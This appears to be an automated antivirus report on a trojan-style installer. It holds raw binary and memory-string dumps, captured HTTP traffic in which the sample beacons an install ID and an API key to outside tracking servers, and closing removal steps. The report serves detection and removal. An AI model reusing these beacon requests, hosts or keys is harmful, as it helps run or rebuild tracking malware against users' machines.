..........%...o....&..&..*.........kk.......0..M........(.....s....%(.
....o....o ...%.o!...%.o"...%o#.......io$....o%...(.....o&...*Vr...p..
...r9..p.....*..('...*.~....-.ri..p.....((...o)...s*........~....*.~..
..*.......*.~....*..( ...*Vs....(,...t.........*.BSJB............v2.0.
50727......l...t...#~...... ...#Strings............#US.........#GUID..
.....P...#Blob...........W..........3........ ...................,....
...............................................Y.................^....
.......<.................y.......................K.................
............Y.....p.....0.......$...3.......J.....J...............s...
..R....._.......................?.....(...........j...................
....s.......................................z.P.=......... .m.=.......
....m.e...............................Z...P ............. ........
<<< skipped >>>


POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




uid=57a764d042bf8&days_after_install=0

HTTP/1.1 200 OK


Date: Mon, 26 Mar 2018 00:30:01 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=410fd42516ca2d083c0e1060ea1bafd9d303f0f7; expires=Mon, 26-Mar-2018 02:30:01 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Mon, 26 Mar 2018 00
:30:01 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=410fd42516ca2d083c0e1060ea1bafd9d303f0f7; e
xpires=Mon, 26-Mar-2018 02:30:01 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}....


POST /api/v5/link HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 17
Expect: 100-continue


HTTP/1.1 100 Continue
....




uid=57a764d042bf8

HTTP/1.1 200 OK


Date: Mon, 26 Mar 2018 00:30:01 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=da37e3835ea758e644d83be9c97878b8fa9e66e9; expires=Mon, 26-Mar-2018 02:30:01 GMT; Max-Age=7200; path=/; httponly
Content-Length: 66
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/ladomainadeserver.com\/redirect\/57a764d042bf8"}HTTP
/1.1 200 OK..Date: Mon, 26 Mar 2018 00:30:01 GMT..Server: Apache/2.4.1
0 (Debian)..Cache-Control: no-cache..Set-Cookie: laravel_session=da37e
3835ea758e644d83be9c97878b8fa9e66e9; e..



POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 26 Mar 2018 00:29:59 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=qkl15tssh42n6lu0rnj47rdpi1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue


HTTP/1.1 100 Continue
....




api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 26 Mar 2018 00:29:59 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=ausq93k8j3pt7gb519shdfn4m6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..

The Trojan connects to the servers at the folowing location(s):

conhost.exe_2700:

.text
`.data
.rsrc
@.reloc
GDI32.dll
USER32.dll
msvcrt.dll
ntdll.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
KERNEL32.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected
Invalid message 0x%x
InitExtendedEditKeys: Unsupported version number(%d)
Console init failed with status 0x%x
CreateWindowsWindow failed with status 0x%x, gle = 0x%x
InitWindowsStuff failed with status 0x%x (gle = 0x%x)
InitSideBySide failed create an activation context. Error: %d
GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.
GetModuleFileNameW failed %d.
Invalid EventType: 0x%x
Dup handle failed for %d of %d (Status = 0x%x)
Couldn't grow input buffer, Status == 0x%x
InitializeScrollBuffer failed, Status = 0x%x
CreateWindow failed with gle = 0x%x
Opening Font file failed with error 0x%x
\ega.cpi
NtReplyWaitReceivePort failed with Status 0x%x
ConsoleOpenWaitEvent failed with Status 0x%x
NtCreatePort failed with Status 0x%x
GetCharWidth32 failed with error 0x%x
GetTextMetricsW failed with error 0x%x
GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x
RtlStringCchCopy failed with Status 0x%x
Cannot allocate 0n%d bytes
|%SWj
O.fBf;
ReCreateDbcsScreenBuffer failed. Restoring to CP=%d
Invalid Parameter: 0x%x, 0x%x, 0x%x
ConsoleKeyInfo buffer is full
Invalid screen buffer size (0x%x, 0x%x)
SetROMFontCodePage: failed to memory allocation %d bytes
FONT.NT
Failed to set font image. wc=x, sz=(%x,%x)
Failed to set font image. wc=x sz=(%x, %x).
Failed to set font image. wc=x sz=(%x,%x)
FullscreenControlSetColors failed - Status = 0x%x
FullscreenControlSetPalette failed - Status = 0x%x
WriteCharsFromInput failed 0x%x
WriteCharsFromInput failed %x
RtlStringCchCopyW failed with Status 0x%x
CreateFontCache failed with Status 0x%x
FTPh
\>.Sj
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
GetKeyboardState
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
_amsg_exit
_acmdln
ShipAssert
NtReplyWaitReceivePort
NtCreatePort
NtEnumerateValueKey
NtQueryValueKey
NtOpenKey
NtAcceptConnectPort
NtReplyPort
SetProcessShutdownParameters
GetCPInfo
conhost.pdb
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
version="5.1.0.0"
name="Microsoft.Windows.ConsoleHost"
<requestedExecutionLevel
name="Microsoft.Windows.ConsoleHost.SystemDefault"
publicKeyToken="6595b64144ccf1df"
name="Microsoft.Windows.SystemCompatible"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
< =$>:>@>
2%2X2
%SystemRoot%
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen
WindowSize
ColorTableu
ExtendedEditkeyCustom
ExtendedEditKey
Software\Microsoft\Windows\CurrentVersion
\ !:=/.<>;|&
%d/%d
cmd.exe
desktop.ini
\console.dll
%d/%d
6.1.7601.17641 (win7sp1_gdr.110623-1503)
CONHOST.EXE
Windows
Operating System
6.1.7601.17641

58NPSAZXW.exe_2692_rwx_0040C000_00004000:

li^~
Li^

wyrm4bnfuck.exe_2968:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
uxtheme.dll
userenv.dll
setupapi.dll
apphelp.dll
propsys.dll
dwmapi.dll
cryptbase.dll
oleacc.dll
version.dll
profapi.dll
comres.dll
clbcatq.dll
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SUPPRESSMSGBOXES
/PASSWORD=password
Specifies the password to use.
For more detailed information, please visit hXXp://VVV.jrsoftware.org/ishelp/index.php?topic=setupcmdline
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.5.7)
Inno Setup Messages (5.5.3)
user32.dll
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetWindowsDirectoryA
MsgWaitForMultipleObjects
ExitWindowsEx
comctl32.dll
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x
4.6.5

wyrm4bnfuck.tmp_2520:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
uxtheme.dll
userenv.dll
setupapi.dll
apphelp.dll
propsys.dll
dwmapi.dll
cryptbase.dll
oleacc.dll
version.dll
profapi.dll
comres.dll
clbcatq.dll
%s_%d
EInvalidOperation
TKeyEvent
TKeyPressEvent
crSQLWait
t.HtR
EInvalidGraphicOperation
TWindowState
poProportional
KeyPreviewT
WindowState`
OnKeyDownD1A
OnKeyPress
OnKeyUp\0A
CTL3D32.DLL
PasswordCharD
ssHorizontal
OnKeyUp
RegDeleteKeyExA
advapi32.dll
.DEFAULT\Control Panel\International
user32.dll
shlwapi.dll
TPSExec
TPSRuntimeClassImporter
TPSExportedVar
Cannot Import
Interface not supported
TPSCustomDebugExec
TPSDebugExec
RICHED20.DLL
RICHED32.DLL
Rstrtmgr.dll
File I/O error %d
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
shell32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
WININIT.INI
t.Htb
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
RegCreateKeyEx
RegOpenKeyEx
sfc.dll
cmd.exe" /C "
COMMAND.COM" /C
PendingFileRenameOperations
PendingFileRenameOperations2
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)
OLEAUT32.DLL
Log opened. (Time zone: UTC%s%.2u:%.2u)
%s Log %s #%.3u.txt
MsgWaitForMultipleObjects
regsvr32.exe"
Cannot register 64-bit DLLs on this version of Windows
HELPER_EXE_AMD64
Cannot utilize 64-bit features on this version of Windows
64-bit helper EXE wasn't extracted
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
CreateNamedPipe
SetNamedPipeHandleState
helper %d 0x%x
Helper process PID: %u
Stopping 64-bit helper process. (PID: %u)
Helper process exited with failure code: 0x%x
TransactNamedPipe
TransactNamedPipe/GetOverlappedResult
Helper: Command did not execute
SOFTWARE\Microsoft\.NETFramework
.NET Framework not found
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
v4.0.30319
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
v2.0.50727
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
v1.1.4322
.NET Framework version %s not found
Fusion.dll
Failed to load .NET Framework DLL "%s"
Failed to get address of .NET Framework CreateAssemblyCache function
.NET Framework CreateAssemblyCache function failed
MoveFileEx failed (%d).
Deleting directory: %s
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d).
Deleting file: %s
Failed to delete the file; it may be in use (%d).
ExtractRecData: Unicode data unsupported by this build
The file appears to be in use (%d). Will delete on restart.
Decrementing shared count (%d-bit): %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Not unregistering DLL/OCX again: %s
Unregistering 64-bit type library: %s
Unregistering 32-bit type library: %s
Uninstalling from GAC: %s
Running Exec filename:
Running Exec parameters:
CreateProcess failed (%d).
Process exit code: %u
Running ShellExec filename:
Running ShellExec parameters:
ShellExecuteEx failed (%d).
Skipping RunOnceId "%s" filename: %s
Unregistering font: %s
zlib: Internal error. Code %d
1.2.1
bzlib: Internal error. Code %d
lzmadecomp: %s
lzmadecomp: Compressed data is corrupted (%d)
DecodeToBuf failed (%d)
UhQ%F
Uh$%F
TPasswordEdit
PasswordEdit(
PasswordD
c:\directory
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Uhß
PasswordPage
PasswordLabel
PasswordEdit
PasswordEditLabel$
Could not find page with ID %d
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s\%s_is1
RestartManager found an application using one of our files: %s
Can use RestartManager to avoid reboot? %s (%d)
CheckPassword
PrepareToInstall failed: %s
Need to restart Windows? %s
/:*?"<>|
\/:*?"<>|
%s-%d.bin
%s-%d%s.bin
..\DISK%d\
Asking user for new disk containing "%s".
Cannot read an encrypted file before the key has been set
LoggedMsgBox returned an unexpected value. Assuming Abort.
Software\Microsoft\Windows\CurrentVersion\Uninstall\
5.5.9 (a)
URLInfoAbout
URLUpdateInfo
Creating directory: %s
Setting permissions on directory: %s
Failed to set permissions on directory (%d).
Setting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Failed to set NTFS compression state (%d).
IMsg
Failed to set value in Fonts registry key.
Failed to open Fonts registry key.
Setting permissions on file: %s
Failed to set permissions on file (%d).
Setting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
%s: The existing file appears to be in use (%d). Will replace on restart.
%s: The existing file appears to be in use (%d). Retrying.
Dest filename: %s
Dest file is protected by Windows File Protection.
Time stamp of our file: %s
Time stamp of existing file: %s
Version of our file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Existing file is protected by Windows File Protection. Skipping.
Uninstaller requires administrator: %s
Registering file as a font ("%s")
Cannot install files to 64-bit locations on this version of Windows
desktop.ini
.ShellClassInfo
{0AFACED1-E828-11D1-9187-B532F1E9575D}
target.lnk
Desktop.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\
Section: %s
Entry: %s
Value: %s
Updating the .INI file.
Successfully updated the .INI file.
Skipping updating the .INI file, only updating uninstall log.
Setting permissions on registry key: %s\%s
Could not set permissions on the registry key because it currently does not exist.
Failed to set permissions on registry key (%d).
Cannot access 64-bit registry keys on this version of Windows
Registration executable created: %s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Registering 64-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 64-bit type library: %s
Registering 32-bit type library: %s
Directory for uninstall files: %s
Will append to existing uninstall log: %s
Will overwrite existing uninstall log: %s
Creating new uninstall log: %s
LoggedMsgBox returned an unexpected value. Assuming Cancel.
RmShutdown returned an error: %d
Fatal exception during installation process (%s):
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFiles: No files matching "%s" found
Invalid symbol '%s' found
Invalid token '%s' found
QuerySpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected status: %d
ShellExecuteEx
ShellExecuteEx returned hProcess=0
Wnd=$%x
FormKeyDown
PasswordCheckHash
Expression error '%s'
Password
SuppressMsgBoxes
Cannot evaluate "%s" constant during Uninstall
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Unknown custom message name "%s" in "cm" constant
srcexe
Cannot expand "pf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
uninstallexe
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Failed to expand shell folder constant "%s"
Unknown constant "%s"
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
cmd.exe
COMMAND.COM
\_setup64.tmp
shfolder.dll
_isetup\_shfoldr.dll
Failed to load DLL "%s"
Found pending rename or delete that matches one of our files: %s
Windows version: %u.%u.%u%s (NT platform: %s)
64-bit Windows: %s
Processor architecture: %s
Defaulting to %s for suppressed message box (%s):
Message box (%s):
User chose %s.
MsgBox failed.
/SPAWNWND=$%x /NOTIFYWND=$%x
64-bit install mode: %s
Windows
_isetup\_isdecmp.dll
_isetup\_iscrypt.dll
/Password=
/SuppressMsgBoxes
/DETACHEDMSG
-0.bin
Setup version: Inno Setup version 5.5.9 (a)
Original Setup EXE:
Not restarting Windows because Setup is being run from the debugger.
Restarting Windows.
Inno Setup version 5.5.9 (a)
Portions Copyright (C) 2000-2016 Martijn Laan
hXXp://VVV.innosetup.com/
hXXp://VVV.remobjects.com/ps
Cannot run files in 64-bit locations on this version of Windows
Type: Exec
Type: ShellExec
RmRestart returned an error: %d
Need to restart Windows, not attempting to restart applications
Will not restart Windows automatically.
System\CurrentControlSet\Control\Windows
TOutputMsgWizardPage
TOutputMsgMemoWizardPage
PasswordEdit
PasswordEditLabel
MsgLabel
Msg1Label
Msg2Label
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
procedure DeleteIniEntry(const Section, Key, Filename: String);
function GetCmdTail: String;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function CheckForMutexes(Mutexes: String): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function MakePendingFileRenameOperationsChecksum: String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function ExitSetupMsgBox: Boolean;
function GetWindowsVersion: Cardinal;
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
function GetWindowsVersionString: String;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function CustomMessage(const MsgName: String): String;
function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
procedure RaiseException(const Msg: String);
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
Cannot call "%s" function during Setup
Cannot call "%s" function during Uninstall
Cannot call "%s" function during non Unicode Setup or Uninstall
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGMEMOPAGE
MSGBOX
Invalid RootKey value
INIKEYEXISTS
GETCMDTAIL
REGKEYEXISTS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYIFEMPTY
REGGETSUBKEYNAMES
CHECKFORMUTEXES
SHELLEXEC
SHELLEXECASORIGINALUSER
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
Unknown custom message name "%s"
EXITSETUPMSGBOX
GETWINDOWSVERSION
GETWINDOWSVERSIONSTRING
%u.%.2u.%u
SUPPRESSIBLEMSGBOX
%u.%u.%u.%u
Cannot disable FS redirection on this version of Windows
GetWindowsVersionEx
Runtime Error (at %d:%d):
Exception "%s" at address %p
TScriptRunner.SetPSExecParameters: Invalid type
TScriptRunner.LoadScript failed
Remove shared file %s? User chose %s%s
/INITPROCWND=$%x
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x
Original Uninstall EXE:
Install was done in 64-bit mode but not running 64-bit Windows now
Removed all? %s
Not restarting Windows because Uninstall is being run from the debugger.
IMsgt
isRS-???.tmp
isRS-%.3u.tmp
DisableProcessWindowsGhosting
FTPF0P
0123456789abcdefInno Setup Setup Data (5.5.7)
Inno Setup Messages (5.5.3)
oleaut32.dll
RegQueryInfoKeyA
RegOpenKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
GetWindowsDirectoryA
CreateNamedPipeA
mpr.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MapVirtualKeyA
GetKeyState
GetKeyNameTextA
ExitWindowsEx
EnumWindows
EnumThreadWindows
comctl32.dll
ole32.dll
ShellExecuteExA
ShellExecuteA
comdlg32.dll
msimg32.dll
.text
`.rdata
@.data
.pdata
@.rsrc
COMCTL32.dll
SHLWAPI.dll
SetProcessShutdownParameters
KERNEL32.dll
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXMZ
`.data
.rsrc
@.reloc
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation
RegKey
GetWindowsDirectoryW
RegOpenKeyA
SHFOLDER.dll
dll\shfolder.dbg
Font.Color
Font.Height
Font.Name
Font.Style
OnKeyDown
Lines.Strings
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
Cannot assign a %s to a %s
Cannot create file %s
Cannot open file %s
Stream write error Out of memory while expanding memory stream*Can't write to a read-only resource stream.WriteObject called twice for the same instance
Class %s not found
Resource %s not found!Resource %s is of incorrect class
List index out of bounds Operation not allowed on sorted string list%String list does not allow duplicates
Tab index out of bounds#A component named %s already exists$''%s'' is not a valid component name
A class named %s already exists#''%s'' is not a valid integer value
Error reading %s.%s: %s
Ancestor for '%s' not found
Bitmap is empty!Cannot change the size of an icon$Unknown picture file extension (.%s)
Unsupported clipboard format
Error creating window Cannot focus a disabled or invisible window!Control '%s' has no parent window
%s property out of range
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex2Cannot have more than one MDI form per application
Could not load CARDS.DLL
Duplicate CardId found"An error returned from DDE ($0%x)/DDE Error - conversation not established ($0%x)0Error occurred when DDE ran out of memory ($0%x)"Unable to connect DDE conversation
Grid too large for operation Too many rows or columns deleted
%s on line %d
''%s'' expected
%s expected
Invalid input value7Invalid input value. Use escape key to abandon changes
Value must be between %d and %d<Cannot create a default method name for an unnamed component
''%s'' is not a valid date
''%s'' is not a valid time#''%s'' is not a valid date and time
Invalid file name - %s
All files (*.*)|*.*
&Files: (*.*)
Invalid clipboard format Clipboard does not support Icons
Custom Colors Operation not supported on selected printer.There is no default printer currently selected
Unable to write to %s
Invalid data type for '%s'
Failed to create key %s
Failed to set data for '%s'
Failed to get data for '%s'9Synchronize called when main VCL thread in a WaitFor call0Unknown RichEdit conversion file extension (.%s)
/Menu '%s' is already being used by another form
Failed to Save Stream)StatusBar cannot have more than 64 panels!Error assigning Hot-Key to %s. %s
Hot-Key is invalid#Window is invalid or a child window%Hot-Key is assigned to another window %s is already associated with %s!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x
n%USERPROFILE%
r%SYSTEMROOT%
5.50.4807.2300
Microsoft(R) Windows (R) 2000 Operating System
Datos de programa%Configuraci
51.52.0.0


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

